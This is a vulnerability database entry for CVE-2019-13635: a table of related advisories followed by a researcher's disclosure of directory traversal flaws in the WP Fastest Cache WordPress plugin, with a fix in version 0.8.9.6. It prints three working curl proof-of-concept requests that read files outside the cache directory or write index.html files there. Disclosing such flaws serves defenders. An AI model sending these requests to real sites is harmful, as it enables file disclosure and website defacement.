| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| WordPress WP Fastest Cache Path Traversal Vulnerability | 31 Jul 201900:00 | – | cnvd | |
| CVE-2019-13635 | 30 Jul 201912:20 | – | cve | |
| CVE-2019-13635 | 30 Jul 201912:20 | – | cvelist | |
| EUVD-2019-5063 | 7 Oct 202500:30 | – | euvd | |
| CVE-2019-13635 | 30 Jul 201913:15 | – | nvd | |
| WordPress Fastest Cache Plugin < 0.8.9.6 Directory Traversal Vulnerability | 1 Aug 201900:00 | – | openvas | |
| WordPress WP Fastest Cache plugin <= 0.8.9.5 - Directory Traversal vulnerability | 14 Aug 201900:00 | – | patchstack | |
| Directory traversal | 30 Jul 201913:15 | – | prion | |
| CVE-2019-13635 | 22 May 202510:06 | – | redhatcve | |
| WP Fastest Cache <= 0.8.9.5 - Directory Traversal | 28 Jul 201900:00 | – | wpvulndb |
`WP Fastest Cache is a Wordpress plugin that creates static html files
from the dynamic WordPress blog in order to speed up operation.
Version 0.8.9.5 and below of the plugin was identified being
vulnerable to directory traversal attacks.
The first two are Windows only, the 3rd one is generic. The Windows
specific ones were tested on WampServer (so with Apache's Httpd).
#1:
The impact is reading files outside of the cache directory. The
attacker has control over the directory only, the file is selected as
the first hit of the scandir results in descending order.
curl --path-as-is http://vulnerable-host.tld/wpfc-minified/..\..\..\/stuff.php
<?php
/**
* XML-RPC protocol support for WordPress
*
* @package WordPress
*/
...
#2:
The cacheFilePath construction logic in cache.php can be abused to
mount a similar attack as vuln #1 and read index.html files outside
the cache directory:
curl --path-as-is http://vulnerable-host.tld/..\..\..\/whatever.html\/..
some html content outside the cache directory
<!-- via php -->
#3:
If the Google Translate plugin is active on the victim system then it
is also possible to create index.html files outside the cache
directory:
curl -v --header "X-GT-LANG: ../../../.."
http://vulnerable-host.tld/some-article/
In configurations where the html extension has higher precedence over
php in the webserver's DirectoryIndex configuration, this could
actually change the front page of the victim website.
Remediation: update to plugin version 0.8.9.6
Imre
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation